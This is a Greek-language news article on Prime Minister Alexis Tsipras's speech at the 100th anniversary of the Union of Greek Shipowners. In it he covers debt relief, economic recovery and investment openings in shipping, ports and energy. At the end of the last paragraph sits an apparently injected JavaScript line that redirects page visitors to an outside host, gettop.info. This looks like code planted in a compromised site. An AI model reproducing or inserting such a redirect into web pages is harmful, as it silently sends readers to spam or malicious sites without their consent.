Μήνυμα Τσίπρα στους Έλληνες πλοιοκτήτες για επενδύσεις (BINTEO)

0
5
ΓΡΑΦΕΙΟ ΤΥΠΟΥ ΠΡΩΘΥΠΟΥΡΓΟΥ/LIAKOS

 

 

Το μήνυμα ότι απαραίτητη προϋπόθεση για να διατηρηθεί η θετική δυναμική που έχει αναπτύξει η χώρα, είναι αποσαφήνιση της στρατηγικής γύρω από τη διαχείριση του ελληνικού χρέους, έστειλε ο Αλέξης Τσίπρας, απευθύνοντας χαιρετισμό σε εκδήλωση για τα 100 χρόνια της Ένωσης Ελλήνων Εφοπλιστών, στο Μέγαρο Μουσικής Αθηνών.

Σημείωσε ότι «πλέον έφτασε η στιγμή να αναγνωριστούν οι προσπάθειες μας μέσω της λήψης των απαραίτητων μέτρων για την ελάφρυνση του χρέους», εξηγώντας ότι με το κλείσιμο και της δεύτερης αξιολόγησης θα καθοριστούν άμεσα και εντός Δεκεμβρίου τα βραχυπρόθεσμα μέσα διευθέτησης του ελληνικού χρέους και πως «επιδιώκουμε ταυτόχρονα, από την αρχή του νέου έτους, να ξεκινήσει και ο καθορισμός και των μεσοπρόθεσμων και μακροπρόθεσμων παρεμβάσεων». Ο κ. Τσίπρας επισήμανε επιπλέον ότι «η Ελλάδα αποτελεί το τελευταίο οχυρό σταθερότητας σε μια ευρύτερα αποσταθεροποιημένη περιοχή».

Παράλληλα, ο πρωθυπουργός προσκάλεσε τους Έλληνες εφοπλιστές να επενδύσουν και να αξιοποιήσουν τις ευκαιρίες που αναδύονται στην χώρα μας, πρώτοι εκείνοι, «δίνοντας το έναυσμα της εμπιστοσύνης και στην παγκόσμια επενδυτική κοινότητα που αναμένει». Διαβεβαίωσε δε ότι η πολιτεία θα συνεχίσει να είναι αρωγός και συνταξιδιώτης στις τρικυμίες και στις νηνεμίες.

Το 2017, το έτος που περιμένουμε να βρει την Ελλάδα να επιστρέφει αυτοδύναμη στις αγορές
Ειδικότερα, ο κ. Τσίπρας είπε ότι «η ελληνική οικονομία μετά από 6 χρόνια βαθιάς κρίσης βρίσκεται επιτέλους στη φάση της ανάκαμψης» και πως τα τελευταία δύο χρόνια η κυβέρνηση επιχειρεί να διορθώσει χρόνιες στρεβλώσεις και να μεταρρυθμίσει την οικονομία, να αλλάξει τα κακώς κείμενα του παρελθόντος, να θεμελιώσει αναπτυξιακό υπόβαθρο στους κλάδους που διαθέτουμε συγκριτικό πλεονέκτημα και να ενισχύσει την ανταγωνιστικότητα της χώρας. Επιπλέον, επιδιώκει να επενδύσει στον Έλληνα ναυτικό και στη συνεχή βελτίωση της εκπαίδευσής του, με σεβασμό στις συνεχείς τεχνολογικές εξελίξεις και τις τάσεις της ναυτικής βιομηχανίας, εστιάζοντας ταυτόχρονα στην καινοτομία και στη συνεχή ανάπτυξη και υλοποίηση έργων εντάσεως ανθρώπινου κεφαλαίου.

Ο πρωθυπουργός υπογράμμισε ότι «το 2016 αναδεικνύεται ως το έτος σταθεροποίησης της οικονομίας», κατά το οποίο «δημιουργήθηκαν οι προϋποθέσεις για την επανεκκίνηση της ελληνικής οικονομίας», «έγιναν σημαντικές μεταρρυθμίσεις και μια αξιόπιστη δημοσιονομική προσαρμογή» και «η ανεργία αν και παραμένει απαράδεκτα υψηλή μπήκε σε τροχιά σταθερής απομείωσης».

Το 2017, τόνισε, είναι ο χρόνος που όλοι περιμένουμε να βρει την Ελλάδα να αναπτύσσεται με υψηλούς ρυθμούς μεγέθυνσης, να συμμετέχει στο πρόγραμμα ποσοτικής χαλάρωσης της ΕΚΤ και να επιστρέφει αυτοδύναμη στις αγορές χρήματος. Επισήμανε ότι αυτό εκτιμούν οι περισσότεροι αναλυτές αλλά και οι επίσημοι φορείς της ΕΕ και του ΔΝΤ.

Προϋπόθεση διατήρησης της θετικής δυναμικής, η αποσαφήνιση της στρατηγικής για το χρέος
Υπογράμμισε σε αυτό το πλαίσιο ότι «απαραίτητη όμως προϋπόθεση για να διατηρηθεί αυτή η θετική δυναμική είναι η αποσαφήνιση της στρατηγικής γύρω από τη διαχείριση του ελληνικού δημόσιου χρέους». Τόνισε ότι η ολοκλήρωση της πρώτης αξιολόγησης «έπεισε και τους πλέον δύσπιστους ότι κάτι έχει αλλάξει, ότι η Ελλάδα μπορεί πλέον να βάζει στόχους και να τους εκπληρώνει ακόμα κι αν αυτοί είναι εξαιρετικά δύσκολοι».

Σημείωσε ωστόσο ότι «η συμφωνία μας με τους εταίρους προβλέπει αμοιβαίες δεσμεύσεις και πλέον έφτασε η στιγμή να αναγνωριστούν οι προσπάθειες μας μέσω της λήψης των απαραίτητων μέτρων για την ελάφρυνση του χρέους». Ειδικότερα, είπε ότι με το κλείσιμο και της δεύτερης αξιολόγησης που βρίσκεται σε εξέλιξη, θα καθοριστούν άμεσα και εντός Δεκεμβρίου τα απαραίτητα βραχυπρόθεσμα μέσα διευθέτησης του ελληνικού χρέους και υπογράμμισε ότι «επιδιώκουμε ταυτόχρονα, από την αρχή του νέου έτους, να ξεκινήσει και ο καθορισμός και των μεσοπρόθεσμων και μακροπρόθεσμων παρεμβάσεων».

Ο οικονομικός ορίζοντας για την Ελλάδα να γίνει ξεκάθαρος
«Ο οικονομικός ορίζοντας για την Ελλάδα, η πρόσβαση της στις αγορές χρήματος, πρέπει να γίνει ξεκάθαρος ορίζοντας και ανοικτή πρόσβαση», σημείωσε ο κ. Τσίπρας, για να επισημάνει ότι το έχει ανάγκη η οικονομία μας, αλλά και η ίδια η Ευρωζώνη. «Ιδιαίτερα σε μια ρευστή διεθνή συγκυρία, όλοι πια συνειδητοποιούν ότι δεν υπάρχει πια κανένας λόγος να διαιωνίζεται το ελληνικό ζήτημα και να παράγει αποσταθεροποίηση στην Ευρώπη», είπε, συμπληρώνοντας: «Πόσο μάλλον όταν η Ελλάδα αποτελεί τελευταίο οχυρό σταθερότητας σε μια ευρύτερα αποσταθεροποιημένη περιοχή».

Σε αυτό το πλαίσιο, είπε ότι οι τελευταίες εξελίξεις στην Ευρώπη και τον κόσμο θα πρέπει να μας οδηγήσουν όχι σε μοιρολατρία αλλά σε δράση, ώστε να μετατρέψουμε τη κρίση σε ευκαιρία, φέρνοντας ως παράδειγμα την κρίση του Brexit, που «πρέπει να μετατραπεί σε επενδυτική ευκαιρία για τον ναυτιλιακό κλάδο».

Οι δυνατότητες από τη γεωστρατηγική θέση της χώρας

Ο πρωθυπουργός είπε ότι η γεωστρατηγική θέση της χώρας μας παρέχει:

Την προοπτική αναβάθμισης των λιμένων με πρότυπο την ποιοτική αναβάθμιση του Πειραιά.

Την εκμετάλλευση μαρίνων.

Την ανάδειξη επιχειρήσεων που θα εξειδικεύονται στην ανάπτυξη καινοτόμων σχεδίων με εφαρμογή στον χώρο της ναυτιλίας.

Την ανάπτυξη της κρουαζιέρας.

Την εμβάθυνση της εμπιστοσύνης και της συνεργασίας που έχουμε αναπτύξει με την Cosco στο λιμάνι του Πειραιά.

Την εκμετάλλευση των συνεργιών που δημιουργεί η παράλληλη ενεργειακή αναβάθμιση της χώρας μας χάρη στα σημαντικά έργα σε εξέλιξη όπως ο TAP και ο IGB, η αναβάθμιση του τερματικού LNG στη Ρεβυθούσα και ο σχεδιαζόμενος FSRU στην Αλεξανδρούπολη.

Σημείωσε ότι αυτά αποτελούν ελπιδοφόρες ενδείξεις ότι υπάρχουν οι ευκαιρίες που θα δώσουν το έναυσμα για την αλλαγή σελίδας στην οικονομία.

Η πολιτεία αρωγός και συνταξιδιώτης στις τρικυμίες και τις νηνεμίες
Ο πρωθυπουργός χαρακτήρισε τη σημερινή επέτειο των 100 χρόνων από την ίδρυση της Ένωσης Ελλήνων Εφοπλιστών ως ένα «ορόσημο τόσο για την ελληνική ναυτιλία, όσο και για την ελληνική οικονομία» και εξήρε την καινοτομία, πρωτοπορία και διορατικότητα των Ελλήνων εφοπλιστών στις επενδύσεις και στον τρόπο λήψης αποφάσεων,χαρακτηριστικά που «έθεσαν τις βάσεις για την κατάκτηση της κορυφής στο διεθνές στίβο».

Είπε ότι το μέταλλο της ελληνικής ναυτοσύνης σφυρηλατήθηκε μέσα από δύο παγκόσμιους πολέμους, τα κραχ στις αγορές χρήματος και κεφαλαίου, την έντονη κυκλικότητα και τις βίαιες διακυμάνσεις του κλάδου. Αυτά, σε συνδυασμό με το ελληνικό δαιμόνιο και την σκληρή δουλειά των Ελλήνων ναυτικών εξασφάλισαν διαχρονικά τα πρωτεία για τον ελληνόκτητο στόλο, τόνισε.

Αναφέρθηκε στις προκλήσεις που αντιμετωπίζει η ελληνική ναυτιλία, η οποία παρά τις δυσκολίες παραμένει πρωτοπόρα σε διεθνές επίπεδο: «Η αναιμική ανάπτυξη της παγκόσμιας οικονομίας σε συνδυασμό με την υπερπροσφορά πλοίων και την απομόχλευση των πιστωτικών ιδρυμάτων, έχει συρρικνώσει την κερδοφορία των περισσοτέρων εταιρειών του χώρου. Σε όλα αυτά έρχονται να προστεθούν οι ταχύτατες εξελίξεις στην τεχνολογία, οι επικείμενες αλλαγές στην εκπομπή των ρύπων, οι πιέσεις από το ευρωπαϊκό πλαίσιο ανταγωνισμού».

Κατόπιν αυτών, ο Αλέξης Τσίπρας σημείωσε ότι «οι προκλήσεις για το μέλλον είναι μεγάλες. Ωστόσο η πολιτεία θα συνεχίσει να είναι αρωγός και συνταξιδιώτης στις τρικυμίες και στις νηνεμίες. Θα συνεχίσει να προασπίζει τα συμφέροντα της ελληνικής ναυτιλίας στους διεθνείς οργανισμούς».

«Να βελτιώνει πολιτικές με γνώμονα το συμφέρον της ελληνικής οικονομίας και κατέθεσε επέκταση της ελληνικής κοινωνίας», τόνισε.

Τα εντυπωσιακά μεγέθη
Αναφερόμενος στα εντυπωσιακά μεγέθη, όπως είπε, του ελληνικού ναυτιλιακού κλάδου, επισήμανε ότι η ελληνική πλοιοκτησία κατατάσσεται πρώτη σε επίπεδο χωρητικότητας, με την Ιαπωνία, την Κίνα και τη Γερμανία να υπολείπονται.

Ανέφερε ότι ο ελληνικός πληθυσμός καταλαμβάνει ποσοστό μόλις 0,15% του παγκόσμιου πληθυσμού και παρόλα αυτά τα πλοία που ελέγχονται από Έλληνες διενεργούν το 25% του παγκόσμιου θαλάσσιου εμπορίου. Είπε ότι αυτό το μέγεθος έχει διπλή ανάγνωση, εξηγώντας ότι «πρωτίστως η συνεισφορά της ελληνικής ναυτιλίας διεθνώς δεν θα πρέπει να εξετάζεται μόνο υπό το πρίσμα της ελληνικής οικονομίας, αλλά είναι επιτακτική ανάγκη να αναδεικνύεται και η συνεισφορά της στην βελτίωση της ανταγωνιστικότητας της Ευρωπαϊκής Ένωσης στο παγκόσμιο θαλάσσιο εμπόριο».

Είπε, τέλος, ότι η παρακαταθήκη και η δυναμική της ελληνικής ναυτιλίας στην διεθνή σκακιέρα, το υψηλότατο επίπεδο των Ελλήνων ναυτικών αλλά και η ποιότητα όσων ολοκληρώνουν τις σπουδές τους στον χώρο των ναυτιλιακών υπηρεσιών γεννάει ελπίδα, αισιοδοξία και θετικές προοπτικές για το μέλλον. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here